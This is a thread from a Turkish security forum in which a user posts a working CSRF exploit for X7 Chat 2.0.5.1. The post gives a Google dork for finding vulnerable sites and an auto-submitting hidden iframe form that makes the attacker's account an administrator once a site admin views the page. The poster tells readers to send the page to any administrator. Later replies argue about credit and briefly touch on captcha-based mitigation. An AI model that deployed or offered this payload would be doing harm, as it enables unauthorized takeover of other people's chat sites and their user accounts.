X7 Chat 2.0.5.1 CSRF Add Admin Exploit

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Muhalif Yorumcu
    SeRDaR
    SeRDaR's avatar
    Kayıt Tarihi: 09/Kasım/2003
    Erkek

    X7 Chat 2.0.5.1 CSRF Add Admin Exploit

    Google Araması:intitle:"Chat Room" "Powered By X7 Chat 2.0.5"

    Yazılım Link: http://x7chat.com/releases/v2/x7chat2_0_5_1.zip

    Version:

    Aşağıdaki kodları kendinize göre düzrnlersiniz her hangi bir yöneticiye aşşağıdaki kodlar frame içinde gönderirisiniz  şu şekilde  girdiğinde sis admin atamış olacak kolay gelsin

    	<iframe style="display:none;" src="frame.html"></iframe><br>
                     //yukarıdaki şekilde frameli olarark aşşağıdaki kodları koyarsınız
    	<html>
    	    <body onload="document.xform.submit();">
    	        <form name="xform" action="http://xxxxxxxxx.com/x7path/index.php?act=adminpanel&cp_page=users&update=YOURUSERNAME" method="post">
    	            <input type="hidden" name="username" value="YOURUSERNAME" />
    	            <input type="hidden" name="usergroup" value="Administrator" />
    	        </form>
    	    </body>
    	</html>

     

    Sarı için:http://www.exploit-db.com/exploits/18850/


    Önemsediğin Kadar Önemsenirsin. Önemsendiğin Kadar Önemsensersin.
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    SARI
    SARI's avatar
    Banlanmış Üye
    Kayıt Tarihi: 29/Eylül/2009
    Erkek

    paylaşım için teşekkürler :D

    http://www.exploit-db.com/exploits/18850/

     


    Ban Sebebi : Molrada Haarket Eiğtti için Bdnlaanı... Türkçe öğretmenliği okuyan arkadaşım sana ders verebilir admin arkadaş :)
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Muhalif Yorumcu
    SeRDaR
    SeRDaR's avatar
    Kayıt Tarihi: 09/Kasım/2003
    Erkek

    SARI bunu yazdı:
    -----------------------------

    paylaşım için teşekkürler :D

    http://www.exploit-db.com/exploits/18850/

     


    -----------------------------
    Teşekkürler kaynağı belirttiğin için dur sana zahmet olmasın konuya ben iliştireyim o linki...
    bana ait güvenlik açıklarını ekstradan belirtiyorum zaten ama genel güvenlik sitelerinde paylaşılan açıkların kaynaklarını belirtmeye gerek duymuyorum sadece burada bunun üzerine konuşulsun diye  birde anlamayanlar vs olurdiye ekstra açıklama yapıyorum kimsenin açığına vs konma gibi durumum yok beni tanıyan tanır SARI anlaşılan sen daha tanımamaışsın beni... yakıştıramadım.


    Önemsediğin Kadar Önemsenirsin. Önemsendiğin Kadar Önemsensersin.
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Twitter
    Twitter's avatar
    Kayıt Tarihi: 13/Ekim/2007
    Erkek

    Aman hocam boş yere gerginlik yaratmayın 

    Bu crsf yi önlemek için captcha dışında yöntemler kullanılabilirmi hocam ?

    Yada bir scriptte csrf ararken adamlar neye dikkat edip exploit ediyor acaba 


    Part Time Engineer, Full Time Dreamer ..
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Mirza Efe
    _Dert_
    _Dert_'s avatar
    Kayıt Tarihi: 12/Aralık/2007
    Erkek

    http://www.tahribat.com/Forum-Tahribat-Com-Changelog-36910/25/#1364030

    Rene'nin bu mesajina sormak lazim, nasil yapit...Csrf meshur oldugunda kendi profilimde deniyordum ise yariyordu imzami degistirebiliyordum  muridlerde denicektim ama sonra tirstim AB aliriz diye :)) her ne olduysa yukaridaki ayardan sonra artik is gormuyor :((


  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Holyzone
    Holyzone's avatar
    Üstün Hizmet Madalyası
    Kayıt Tarihi: 13/Ekim/2008
    Erkek

    SARI bunu yazdı:
    -----------------------------

    paylaşım için teşekkürler :D

    http://www.exploit-db.com/exploits/18850/

     


    -----------------------------

    Sarı'nın exploit yazması, yayınlaması dileğiyle :D Sağol Serdar

  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    EcHoLL
    EcHoLL's avatar
    Kayıt Tarihi: 04/Eylül/2008
    Erkek

    Twitter bunu yazdı:
    -----------------------------

    Aman hocam boş yere gerginlik yaratmayın 

    Bu crsf yi önlemek için captcha dışında yöntemler kullanılabilirmi hocam ?

    Yada bir scriptte csrf ararken adamlar neye dikkat edip exploit ediyor acaba 


    -----------------------------

     

    auto run a dikkat ediyor o bölümlen tanımlandıgında post ediyor scriptin için auto run of yaparsan csrf önlemiş olursun  ama tamamen değil tamımı önlemek o sayfaya imaj sorugusu koymak en güvenlisi


    "Hayat zor olabilir ama ben de kolay sayılmam." insanları Silahsızlandırmak onları köleleştirmek için En iyi Yoldur.
Toplam Hit: 1456 Toplam Mesaj: 7